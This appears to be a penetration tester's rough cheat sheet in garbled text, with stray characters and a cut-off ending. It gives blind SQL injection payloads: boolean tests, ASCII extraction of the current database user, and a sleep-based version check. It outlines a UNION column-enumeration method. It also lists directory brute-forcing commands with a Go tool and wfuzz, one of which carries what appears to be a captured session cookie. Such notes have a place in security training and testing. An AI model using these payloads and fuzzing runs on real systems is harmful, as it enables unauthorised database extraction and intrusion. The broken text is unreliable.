Id=1 AND 1 = 2 -> (False) insert this statment to view the difference in the response with the true oneġ AND ASCII(SUBSTRING(current_user(),1,1))=112 -> 112 aciii pĪND IF(version() like '5%', sleep(10), 'false')). # BOOLEAN: ->(1- Detect the false query to view the difference with the true one, 2- When you know the false response find leter by letter) =>SQL INJECTIONS (1- add "NULL" columns until you know how many they have, 2- change the column to know which one is printable, 3- look for the concatenated text "sssssectest") Go run main.go -u -w wordlist.txt -s 200,301 -k -t 100 -v -> -k no certificate check -v verbose -t threads Wfuzz with docker (openssl fixed)ĭocker run -v /media/sf_Shared_VM/SecLists/Discovery/Web-Content/:/mnt/test dominicbreuker/wfuzz:latest -c -z file,/mnt/test/raft-medium-directories-lowercase.txt -hc 404
> copy/paste the cookies from the "to curl" burp option Wfuzz -c -z file,/root/Desktop/Dictionar/all.txt -hc 404 -b "loguser= logpass= hciw=1 hsnu=Pepe ASP.NET_SessionId=yewr3vdm4m1ygm4gxhcizuzm hscid=-1.
Wfuzz -c -z file,/media/sf_Shared_vm/Fuzzing\